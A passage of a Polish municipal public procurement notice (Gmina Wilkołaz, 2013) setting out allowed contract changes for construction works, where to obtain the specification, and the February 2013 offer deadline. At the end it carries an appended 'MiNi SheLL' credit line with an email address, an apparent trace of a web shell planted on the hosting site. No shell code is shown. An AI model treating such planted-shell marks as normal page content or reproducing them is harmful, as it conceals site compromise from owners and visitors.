    2.9. Zmiana stawki i koty podatku VAT


3.W przypadku robót budowlanych Zamawiający  przewiduje ponadto zmiany następujące:

    3.1. Zmiana terminu spowodowana wstrzymaniem budowy przez właściwy organ z przyczyn nie   
         zawinionych przez Wykonawcę.
    3.2. Wydłużenie terminu wykonania umowy w związku z koniecznością wykonania robót 
         uzupełniających, dodatkowych lub zamiennych wynikłych w trakcie realizacji robót i wystąpienia  
        okoliczności powodujących konieczność zmiany terminu wykonania robót podstawowych.
    3.3 Zmiana sposobu lub zakresu wykonania robót w przypadkach zmiany przepisów skutkiem czego 
         jest konieczność przyjęcia odmiennych rozwiązań niż założono w dokumentacji projektowej.
  
   4. Wykonawca wnioskujący o zmianę umowy, przedkłada Zamawiającemu pisemne uzasadnienie 
        konieczności wprowadzenia zmian umowy. O  wystąpieniu okoliczności mogących wpłynąć na 
        zmianę umowy Wykonawca  winien jest  poinformować Zamawiającego pisemnie.
   5. Nie stanowi zmiany umowy w rozumieniu art.. 144 prawa zamówień publicznych  zmiana danych 
       związanych z obsługą organizacyjno-administracyjną umowy ( zmiana numeru konta bankowego, 
      zmiana danych teleadresowych, zmiana osób wskazanych do kontaktów między stronami).



6.  Wszelkie zmiany w umowie wymagają formy pisemnej pod rygorem nieważności.  
7. Termin zakończenia wykonania przedmiotu umowy  zostanie  przesunięty o  okres trwania przeszkód  wymienionych w pkt 2,3 . W tym przypadku nie stosuje się kar umownych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.lublin.pl/wilkołaz<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wilkołaz
Wilkołaz Pierwszy 9
                                                           23-212 Wilkołaz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.02.2013 godzina 10:00, miejsce: Urząd Gminy Wilkołaz
Wilkołaz Pierwszy 9
                                                           23-212 Wilkołaz.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com